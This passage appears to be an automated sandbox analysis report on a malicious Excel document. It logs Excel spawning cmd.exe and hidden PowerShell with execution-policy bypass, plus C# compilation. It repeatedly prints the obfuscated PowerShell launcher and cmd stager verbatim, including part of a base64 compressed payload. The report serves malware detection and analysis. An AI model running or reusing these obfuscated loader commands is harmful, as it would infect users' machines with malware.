Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp' 'c:\Users\user\AppData\Local\Temp\CSCAD75.tmp'
Source: unknown | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3552.tmp'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3553.tmp'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp' 'c:\Users\user\AppData\Local\Temp\CSCAD75.tmp'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3552.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3553.tmp'
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbxxK3 source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp
Source: Binary string: Qkc:\Users\user\AppData\Local\Temp\ua6j8io5.pdb source: csc.exe, 00000005.00000002.1650949937.019BD000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdbn Files\Oracle;;~3 source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: tion.pdbL source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.1674343739.019B0000.00000002.sdmp, powershell.exe, 00000009.00000002.1780905680.03FA0000.00000002.sdmp
Source: Binary string: Display this usage messageSSpecify debug information file name (default: output file name with .pdb extension)5### Visual C# 2005 Compiler Defect Report, created %s source: csc.exe, 00000005.00000002.1650835635.00360000.00000002.sdmp
Source: Binary string: mscorlib.pdbKK13 source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp
Source: Binary string: l\Temp\ua6j8io5.pdb18e3b_8.0.50727.4940_none_d08cc06a442b34 source: csc.exe, 00000005.00000002.1650699682.00209000.00000004.sdmp
Source: Binary string: wPkc:\Users\user\AppData\Local\Temp\ua6j8io5.pdb source: csc.exe, 00000005.00000003.1645423451.0032C000.00000004.sdmp
Source: Binary string: mscorlib.pdbjjfu source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp
Source: Binary string: indows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb=. source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1777244667.01BB8000.00000004.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Temp\ua6j8io5.pdb source: powershell.exe, 00000004.00000002.1679049173.04370000.00000004.sdmp, csc.exe, 00000005.00000003.1647057868.00232000.00000004.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Temp\3ndkwphw.pdb source: powershell.exe, 00000009.00000002.1781647232.04430000.00000004.sdmp
Source: Binary string: /C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllty Config\v2.0.50727.312\security.config.cch.4060.729296nagement.Automation.pdbs\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\Syste source: powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp
Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbe source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: l\Temp\ua6j8io5.pdb18e3b_8.0.50727.4940_none_d08cc06a442b34& source: csc.exe, 00000005.00000003.1647115077.00209000.00000004.sdmp
Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp

Data Obfuscation:

Obfuscated command line found
Source: unknown | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: unknown | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: unknown | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
PowerShell case anomaly found
Source: unknown | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
